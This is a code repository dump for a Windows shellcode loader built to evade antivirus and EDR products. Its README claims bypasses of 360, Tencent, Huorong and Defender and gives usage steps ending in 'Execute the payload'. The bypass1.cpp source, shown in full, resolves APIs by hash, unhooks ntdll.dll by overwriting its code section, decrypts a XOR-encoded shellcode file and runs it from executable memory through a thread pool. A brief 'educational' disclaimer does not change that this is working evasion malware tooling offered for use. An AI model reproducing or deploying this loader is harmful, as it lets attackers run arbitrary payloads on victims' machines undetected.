├── LICENSE
├── README.md
├── bypass1
    ├── bypass1.cpp
    ├── bypass1.sln
    ├── bypass1.vcxproj
    ├── bypass1.vcxproj.filters
    ├── bypass1.vcxproj.user
    ├── bypass1
    │   └── x64
    │   │   └── Release
    │   │       ├── bypass1.Build.CppClean.log
    │   │       ├── bypass1.exe.recipe
    │   │       ├── bypass1.iobj
    │   │       ├── bypass1.ipdb
    │   │       ├── bypass1.log
    │   │       ├── bypass1.obj
    │   │       ├── bypass1.tlog
    │   │           ├── CL.command.1.tlog
    │   │           ├── CL.read.1.tlog
    │   │           ├── CL.write.1.tlog
    │   │           ├── Cl.items.tlog
    │   │           ├── bypass1.lastbuildstate
    │   │           ├── link.command.1.tlog
    │   │           ├── link.read.1.tlog
    │   │           ├── link.secondary.1.tlog
    │   │           └── link.write.1.tlog
    │   │       ├── bypass1.vcxproj.FileListAbsolute.txt
    │   │       ├── tp.obj
    │   │       └── vc143.pdb
    ├── tp
    │   └── x64
    │   │   └── Release
    │   │       ├── bypass1.log
    │   │       ├── bypass1.obj
    │   │       ├── bypass1.vcxproj.FileListAbsolute.txt
    │   │       ├── tp.Build.CppClean.log
    │   │       ├── tp.exe.recipe
    │   │       └── tp.tlog
    │   │           ├── CL.command.1.tlog
    │   │           ├── CL.read.1.tlog
    │   │           ├── CL.write.1.tlog
    │   │           ├── Cl.items.tlog
    │   │           ├── link.command.1.tlog
    │   │           ├── link.read.1.tlog
    │   │           ├── link.secondary.1.tlog
    │   │           ├── link.write.1.tlog
    │   │           └── tp.lastbuildstate
    └── x64
    │   └── Release
    │       ├── shellcode.bin
    │       └── tp.exe
├── images
    ├── 360_bypass1.png
    ├── Defender_test.png
    ├── huorong_bypass1.png
    └── tencent_bypass1.png
├── test
    ├── test.cpp
    ├── test.sln
    ├── test.vcxproj
    ├── test.vcxproj.filters
    ├── test.vcxproj.user
    ├── test
    │   └── x64
    │   │   └── Release
    │   │       ├── test.exe.recipe
    │   │       ├── test.iobj
    │   │       ├── test.ipdb
    │   │       ├── test.log
    │   │       ├── test.obj
    │   │       ├── test.tlog
    │   │           ├── CL.command.1.tlog
    │   │           ├── CL.read.1.tlog
    │   │           ├── CL.write.1.tlog
    │   │           ├── Cl.items.tlog
    │   │           ├── link.command.1.tlog
    │   │           ├── link.read.1.tlog
    │   │           ├── link.secondary.1.tlog
    │   │           ├── link.write.1.tlog
    │   │           └── test.lastbuildstate
    │   │       └── vc143.pdb
    └── x64
    │   └── Release
    │       ├── test.exe
    │       └── test.pdb
├── videos
    ├── 360bypass.mp4
    ├── defender_bypass.mp4
    └── tencent&huorong.mp4
└── xor.py


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2024 jason123
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader Bypass Techniques  
 2 | 
 3 | This repository contains examples of advanced Shellcode Loader bypass techniques implemented in `test.cpp` and `bypass1.cpp`. These techniques are designed to evade detection and bypass modern security mechanisms such as EDR (Endpoint Detection and Response) and AV (Antivirus) solutions.   
 4 | 
 5 | **Note:** Using binary files smaller than 100kb tends to be more stable due to memory allocation limits imposed by thread pool execution; otherwise, you may need to sacrifice stealth.  
 6 | 
 7 | ## Techniques in `test.cpp`  
 8 | 
 9 | The following bypass techniques are implemented in `test.cpp`:  
10 | 
11 | 1. **API Resolution and Dynamic Invocation**  
12 |    Dynamically resolve and call APIs at runtime to avoid static detection.  
13 | 
14 | 2. **API Hammering**  
15 |    Repeatedly call benign APIs to obfuscate behavior-based detection mechanisms.  
16 | 
17 | 3. **String Obfuscation and Decryption**  
18 |    Obfuscate sensitive strings (such as API names and Shellcode) and decrypt them at runtime to evade static analysis.  
19 | 
20 | 4. **NTDLL Recovery and Unhooking**  
21 |    Restore the original, unhooked `ntdll.dll` to bypass user-mode hooks placed by EDR.  
22 | 
23 | 5. **Thread Pool Execution of Shellcode**  
24 |    Use a thread pool to execute Shellcode, mimicking legitimate application behavior.  
25 | 
26 | 6. **Remote Thread Injection**  
27 |    Inject Shellcode into a remote process to execute the payload stealthily.  
28 | 
29 | 7. **Encrypted Shellcode File Loading (`shellcode.bin`)**  
30 |    Load and decrypt an encrypted Shellcode file (`shellcode.bin`) at runtime to avoid detection.  
31 | 
32 | ## Techniques in `bypass1.cpp`  
33 | 
34 | The following bypass techniques are implemented in `bypass1.cpp`:  
35 | 
36 | 1. **API Hash Resolution Function**  
37 |    Use hashed names instead of plaintext strings to resolve API functions, circumventing static analysis.  
38 | 
39 | 2. **API Hammering**  
40 |    Similar to `test.cpp`, repeatedly call benign APIs to obfuscate behavior-based detection mechanisms.  
41 | 
42 | 3. **Dynamic API Resolution**  
43 |    Dynamically resolve API functions at runtime to avoid static detection.  
44 | 
45 | 4. **Unhooking `ntdll.dll`**  
46 |    Restore the original, unhooked `ntdll.dll` to bypass user-mode hooks.  
47 | 
48 | 5. **Encrypted Shellcode File Loading (`shellcode.bin`)**  
49 |    Load and decrypt an encrypted Shellcode file (`shellcode.bin`) at runtime to avoid detection.  
50 | 
51 | 6. **Thread Pool Execution**  
52 |    Use a thread pool to execute Shellcode, mimicking legitimate application behavior.  
53 | 
54 | 7. **Stealthy Memory Allocation**  
55 |    Allocate memory for Shellcode in a stealthy manner to avoid triggering detection caused by suspicious patterns.  
56 | 
57 | ## Usage Instructions  
58 | 
59 | 1. Use your preferred method to generate a `.bin` file of the raw Shellcode.  
60 | 2. Rename the file to `input.bin` and run `xor.py`. This will generate an encrypted file named `output.bin`.  
61 | 3. Rename `output.bin` to `shellcode.bin` and place it in the same directory as the executable.  
62 | 4. Execute the payload.  
63 | 
64 | 
65 | Shellcode Loader Bypass Screenshots  
66 | 
67 | ### 1. 360 Bypass  
68 | ![360 Bypass](https://github.com/Answerr/shellcode_loader_bypass/blob/main/images/360_bypass1.png)  
69 | 
70 | ### 2. Defender Test  
71 | ![Defender Test](https://github.com/Answerr/shellcode_loader_bypass/blob/main/images/Defender_test.png)  
72 | 
73 | ### 3. Huorong Bypass  
74 | ![Huorong Bypass](https://github.com/Answerr/shellcode_loader_bypass/blob/main/images/huorong_bypass1.png)  
75 | 
76 | ### 4. Tencent Bypass  
77 | ![Tencent Bypass](https://github.com/Answerr/shellcode_loader_bypass/blob/main/images/tencent_bypass1.png)
78 | 
79 | # Summary  
80 | 
81 | - **`test.cpp`:** Can bypass Tencent, Huorong, and Defender, but fails to bypass 360 due to the addition of remote injection targeting `RuntimeBroker.exe`.  
82 | 
83 | - **`bypass1.cpp`:** Can bypass Tencent, Huorong, and 360, but fails to bypass Defender.  
84 | 
85 | ## Disclaimer  
86 | 
87 | This repository is for educational and research purposes only. The techniques demonstrated here should not be used for malicious purposes. Always ensure compliance with applicable laws and regulations.
88 | 


--------------------------------------------------------------------------------
/bypass1/bypass1.cpp:
--------------------------------------------------------------------------------
  1 | #include <windows.h>
  2 | #include <tlhelp32.h>
  3 | #include <vector>
  4 | #include <fstream>
  5 | #include <iterator>
  6 | #include <winternl.h>
  7 | #include <threadpoolapiset.h>
  8 | #include <unordered_map>
  9 | 
 10 | #pragma comment(lib, "ntdll.lib")
 11 | 
 12 | std::unordered_map<DWORD, FARPROC> apiHashTable;
 13 | 
 14 | DWORD HashString(const char* str) {
 15 |     DWORD hash = 0;
 16 |     while (*str) {
 17 |         hash = ((hash << 5) + hash) + *str++;
 18 |     }
 19 |     return hash;
 20 | }
 21 | 
 22 | FARPROC ResolveAPI(DWORD hash) {
 23 |     if (apiHashTable.find(hash) != apiHashTable.end()) {
 24 |         return apiHashTable[hash];
 25 |     }
 26 | 
 27 |     HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
 28 |     if (!hNtdll) return nullptr;
 29 | 
 30 |     auto pExportDir = reinterpret_cast<PIMAGE_EXPORT_DIRECTORY>(
 31 |         reinterpret_cast<BYTE*>(hNtdll) +
 32 |         reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(hNtdll) +
 33 |             reinterpret_cast<PIMAGE_DOS_HEADER>(hNtdll)->e_lfanew)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
 34 | 
 35 |     auto pNames = reinterpret_cast<DWORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfNames);
 36 |     auto pFunctions = reinterpret_cast<DWORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfFunctions);
 37 |     auto pOrdinals = reinterpret_cast<WORD*>(reinterpret_cast<BYTE*>(hNtdll) + pExportDir->AddressOfNameOrdinals);
 38 | 
 39 |     for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {
 40 |         const char* apiName = reinterpret_cast<const char*>(reinterpret_cast<BYTE*>(hNtdll) + pNames[i]);
 41 |         DWORD apiHash = HashString(apiName);
 42 | 
 43 |         if (apiHash == hash) {
 44 |             auto proc = reinterpret_cast<FARPROC>(reinterpret_cast<BYTE*>(hNtdll) + pFunctions[pOrdinals[i]]);
 45 |             apiHashTable[hash] = proc;
 46 |             return proc;
 47 |         }
 48 |     }
 49 |     return nullptr;
 50 | }
 51 | 
 52 | typedef BOOL(WINAPI* LPDSENUMATTRIBUTES)(void* lpShellcode);
 53 | 
 54 | void DecryptShellcode(std::vector<unsigned char>& shellcode, unsigned char key) {
 55 |     for (size_t i = 0; i < shellcode.size(); ++i) {
 56 |         shellcode[i] ^= key;
 57 |     }
 58 | }
 59 | 
 60 | void UnhookNtdll() {
 61 |     DWORD hashVirtualProtect = HashString("VirtualProtect");
 62 |     FARPROC pVirtualProtect = ResolveAPI(hashVirtualProtect);
 63 | 
 64 |     HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
 65 |     if (!hNtdll) return;
 66 | 
 67 |     wchar_t systemDir[MAX_PATH] = { 0 };
 68 |     GetSystemDirectory(systemDir, MAX_PATH);
 69 | 
 70 |     wchar_t ntdllPath[MAX_PATH] = { 0 };
 71 |     wcscat_s(ntdllPath, systemDir);
 72 |     wcscat_s(ntdllPath, L"\ntdll.dll");
 73 | 
 74 |     HANDLE hFile = CreateFile(ntdllPath, GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, nullptr);
 75 |     if (hFile == INVALID_HANDLE_VALUE) return;
 76 | 
 77 |     DWORD fileSize = GetFileSize(hFile, nullptr);
 78 |     if (fileSize == INVALID_FILE_SIZE) {
 79 |         CloseHandle(hFile);
 80 |         return;
 81 |     }
 82 | 
 83 |     HANDLE hMapping = CreateFileMapping(hFile, nullptr, PAGE_READONLY, 0, fileSize, nullptr);
 84 |     if (!hMapping) {
 85 |         CloseHandle(hFile);
 86 |         return;
 87 |     }
 88 | 
 89 |     void* pFileData = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0);
 90 |     if (!pFileData) {
 91 |         CloseHandle(hMapping);
 92 |         CloseHandle(hFile);
 93 |         return;
 94 |     }
 95 | 
 96 |     auto pLoadedNtdll = reinterpret_cast<BYTE*>(hNtdll);
 97 |     auto pDosHeader = reinterpret_cast<PIMAGE_DOS_HEADER>(pFileData);
 98 |     auto pNtHeaders = reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<BYTE*>(pFileData) + pDosHeader->e_lfanew);
 99 | 
100 |     auto pSectionHeader = IMAGE_FIRST_SECTION(pNtHeaders);
101 |     for (WORD i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++, pSectionHeader++) {
102 |         if (!strcmp(reinterpret_cast<char*>(pSectionHeader->Name), ".text")) {
103 |             DWORD oldProtect;
104 |             reinterpret_cast<BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD)>(pVirtualProtect)(
105 |                 pLoadedNtdll + pSectionHeader->VirtualAddress,
106 |                 pSectionHeader->Misc.VirtualSize,
107 |                 PAGE_EXECUTE_READWRITE,
108 |                 &oldProtect
109 |                 );
110 | 
111 |             memcpy(
112 |                 pLoadedNtdll + pSectionHeader->VirtualAddress,
113 |                 reinterpret_cast<BYTE*>(pFileData) + pSectionHeader->PointerToRawData,
114 |                 pSectionHeader->SizeOfRawData
115 |             );
116 | 
117 |             reinterpret_cast<BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD)>(pVirtualProtect)(
118 |                 pLoadedNtdll + pSectionHeader->VirtualAddress,
119 |                 pSectionHeader->Misc.VirtualSize,
120 |                 oldProtect,
121 |                 &oldProtect
122 |                 );
123 |             break;
124 |         }
125 |     }
126 | 
127 |     UnmapViewOfFile(pFileData);
128 |     CloseHandle(hMapping);
129 |     CloseHandle(hFile);
130 | }
131 | 
132 | void ExecuteShellcodeWithThreadpool(const std::vector<unsigned char>& shellcode) {
133 |     void* execMemory = VirtualAlloc(
134 |         nullptr,
135 |         shellcode.size(),
136 |         MEM_COMMIT | MEM_RESERVE,
137 |         PAGE_EXECUTE_READWRITE
138 |     );
139 | 
140 |     if (!execMemory) {
141 |         return;
142 |     }
143 | 
144 |     memcpy(execMemory, shellcode.data(), shellcode.size());
145 | 
146 |     PTP_WORK work = CreateThreadpoolWork(
147 |         [](PTP_CALLBACK_INSTANCE, void* context, PTP_WORK) {
148 |             auto shellcodePtr = reinterpret_cast<void(*)()>(context);
149 |             shellcodePtr();
150 |         },
151 |         execMemory,
152 |         nullptr
153 |     );
154 | 
155 |     if (work) {
156 |         SubmitThreadpoolWork(work);
157 |         WaitForThreadpoolWorkCallbacks(work, FALSE);
158 |         CloseThreadpoolWork(work);
159 |     }
160 | 
161 |     VirtualFree(execMemory, 0, MEM_RELEASE);
162 | }
163 | 
164 | DWORD FindProcessId(const wchar_t* processName) {
165 |     PROCESSENTRY32 pe32;
166 |     HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
167 |     if (hSnapshot == INVALID_HANDLE_VALUE) {
168 |         return 0;
169 |     }
170 | 
171 |     pe32.dwSize = sizeof(PROCESSENTRY32);
172 |     if (Process32First(hSnapshot, &pe32)) {
173 |         do {
174 |             if (!_wcsicmp(pe32.szExeFile, processName)) {
175 |                 CloseHandle(hSnapshot);
176 |                 return pe32.th32ProcessID;
177 |             }
178 |         } while (Process32Next(hSnapshot, &pe32));
179 |     }
180 | 
181 |     CloseHandle(hSnapshot);
182 |     return 0;
183 | }
184 | 
185 | int main() {
186 |     const char* filename = "shellcode.bin";
187 |     const unsigned char key = 0x5A;
188 | 
189 |     UnhookNtdll();
190 | 
191 |     std::ifstream file(filename, std::ios::binary);
192 |     if (!file.is_open()) {
193 |         return -1;
194 |     }
195 | 
196 |     std::vector<unsigned char> encryptedShellcode(
197 |         (std::istreambuf_iterator<char>(file)),
198 |         std::istreambuf_iterator<char>()
199 |     );
200 |     file.close();
201 | 
202 |     if (encryptedShellcode.empty()) {
203 |         return -1;
204 |     }
205 | 
206 |     DecryptShellcode(encryptedShellcode, key);
207 | 
208 |     ExecuteShellcodeWithThreadpool(encryptedShellcode);
209 | 
210 |     return 0;
211 | }


--------------------------------------------------------------------------------
/bypass1/bypass1.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.11.35303.130
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "bypass1", "bypass1.vcxproj", "{39C1481D-CD42-4E6E-8435-35AE9744975E}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Debug|x64.Build.0 = Debug|x64
18 | 		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Debug|x86.Build.0 = Debug|Win32
20 | 		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Release|x64.ActiveCfg = Release|x64
21 | 		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Release|x64.Build.0 = Release|x64
22 | 		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Release|x86.ActiveCfg = Release|Win32
23 | 		{39C1481D-CD42-4E6E-8435-35AE9744975E}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {0853DA9C-5E02-47FB-B6E6-E306AD32A614}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/bypass1/bypass1.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{39c1481d-cd42-4e6e-8435-35ae9744975e}</ProjectGuid>
 25 |     <RootNamespace>bypass1</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |     <ProjectName>bypass1</ProjectName>
 28 |   </PropertyGroup>
 29 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 30 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 31 |     <ConfigurationType>Application</ConfigurationType>
 32 |     <UseDebugLibraries>true</UseDebugLibraries>
 33 |     <PlatformToolset>v143</PlatformToolset>
 34 |     <CharacterSet>Unicode</CharacterSet>
 35 |   </PropertyGroup>
 36 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 37 |     <ConfigurationType>Application</ConfigurationType>
 38 |     <UseDebugLibraries>false</UseDebugLibraries>
 39 |     <PlatformToolset>v143</PlatformToolset>
 40 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 41 |     <CharacterSet>Unicode</CharacterSet>
 42 |   </PropertyGroup>
 43 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 44 |     <ConfigurationType>Application</ConfigurationType>
 45 |     <UseDebugLibraries>true</UseDebugLibraries>
 46 |     <PlatformToolset>v143</PlatformToolset>
 47 |     <CharacterSet>Unicode</CharacterSet>
 48 |   </PropertyGroup>
 49 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 50 |     <ConfigurationType>Application</ConfigurationType>
 51 |     <UseDebugLibraries>false</UseDebugLibraries>
 52 |     <PlatformToolset>v143</PlatformToolset>
 53 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 54 |     <CharacterSet>Unicode</CharacterSet>
 55 |   </PropertyGroup>
 56 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 57 |   <ImportGroup Label="ExtensionSettings">
 58 |   </ImportGroup>
 59 |   <ImportGroup Label="Shared">
 60 |   </ImportGroup>
 61 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 62 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 63 |   </ImportGroup>
 64 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 65 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 66 |   </ImportGroup>
 67 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 68 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 69 |   </ImportGroup>
 70 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 71 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 72 |   </ImportGroup>
 73 |   <PropertyGroup Label="UserMacros" />
 74 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 75 |     <ClCompile>
 76 |       <WarningLevel>Level3</WarningLevel>
 77 |       <SDLCheck>true</SDLCheck>
 78 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 79 |       <ConformanceMode>true</ConformanceMode>
 80 |     </ClCompile>
 81 |     <Link>
 82 |       <SubSystem>Console</SubSystem>
 83 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 84 |     </Link>
 85 |   </ItemDefinitionGroup>
 86 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 87 |     <ClCompile>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 90 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 91 |       <SDLCheck>true</SDLCheck>
 92 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 93 |       <ConformanceMode>true</ConformanceMode>
 94 |     </ClCompile>
 95 |     <Link>
 96 |       <SubSystem>Console</SubSystem>
 97 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
 98 |       <OptimizeReferences>true</OptimizeReferences>
 99 |       <GenerateDebugInformation>true</GenerateDebugInformation>
100 |     </Link>
101 |   </ItemDefinitionGroup>
102 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
103 |     <ClCompile>
104 |       <WarningLevel>Level3</WarningLevel>
105 |       <SDLCheck>true</SDLCheck>
106 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
107 |       <ConformanceMode>true</ConformanceMode>
108 |     </ClCompile>
109 |     <Link>
110 |       <SubSystem>Console</SubSystem>
111 |       <GenerateDebugInformation>true</GenerateDebugInformation>
112 |     </Link>
113 |   </ItemDefinitionGroup>
114 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
115 |     <ClCompile>
116 |       <WarningLevel>Level3</WarningLevel>
117 |       <FunctionLevelLinking>true</FunctionLevelLinking>
118 |       <IntrinsicFunctions>true</IntrinsicFunctions>
119 |       <SDLCheck>false</SDLCheck>
120 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
121 |       <ConformanceMode>true</ConformanceMode>
122 |       <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
123 |       <WholeProgramOptimization>false</WholeProgramOptimization>
124 |       <BufferSecurityCheck>false</BufferSecurityCheck>
125 |       <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
126 |       <DebugInformationFormat>None</DebugInformationFormat>
127 |     </ClCompile>
128 |     <Link>
129 |       <SubSystem>Console</SubSystem>
130 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
131 |       <OptimizeReferences>true</OptimizeReferences>
132 |       <GenerateDebugInformation>false</GenerateDebugInformation>
133 |     </Link>
134 |   </ItemDefinitionGroup>
135 |   <ItemGroup>
136 |     <ClCompile Include="bypass1.cpp" />
137 |   </ItemGroup>
138 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
139 |   <ImportGroup Label="ExtensionTargets">
140 |   </ImportGroup>
141 | </Project>


--------------------------------------------------------------------------------
/bypass1/bypass1.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="源文件">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="头文件">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="资源文件">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="bypass1.cpp">
19 |       <Filter>源文件</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/bypass1/bypass1.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.Build.CppClean.log:
--------------------------------------------------------------------------------
 1 | c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.obj
 2 | c:\users\jason\source\repos\bypass1\x64\release\bypass1.exe
 3 | c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.command.1.tlog
 4 | c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.items.tlog
 5 | c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.read.1.tlog
 6 | c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\cl.write.1.tlog
 7 | c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\link.command.1.tlog
 8 | c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\link.read.1.tlog
 9 | c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\link.secondary.1.tlog
10 | c:\users\jason\source\repos\bypass1\bypass1\x64\release\bypass1.tlog\link.write.1.tlog
11 | 


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.exe.recipe:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project>
 3 |   <ProjectOutputs>
 4 |     <ProjectOutput>
 5 |       <FullPath>C:\Users\Jason\source\repos\bypass1\x64\Release\bypass1.exe</FullPath>
 6 |     </ProjectOutput>
 7 |   </ProjectOutputs>
 8 |   <ContentFiles />
 9 |   <SatelliteDlls />
10 |   <NonRecipeFileRefs />
11 | </Project>


--------------------------------------------------------------------------------
/bypass1/bypass1/x64/Release/bypass1.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Answerr/shellcode_loader_bypass/0db19b4bf926aef32029f160d8d4b91ae0dae120/bypass1/bypass1/x64/Release/bypass1.iobj


--------------------------------------------------------------------------------
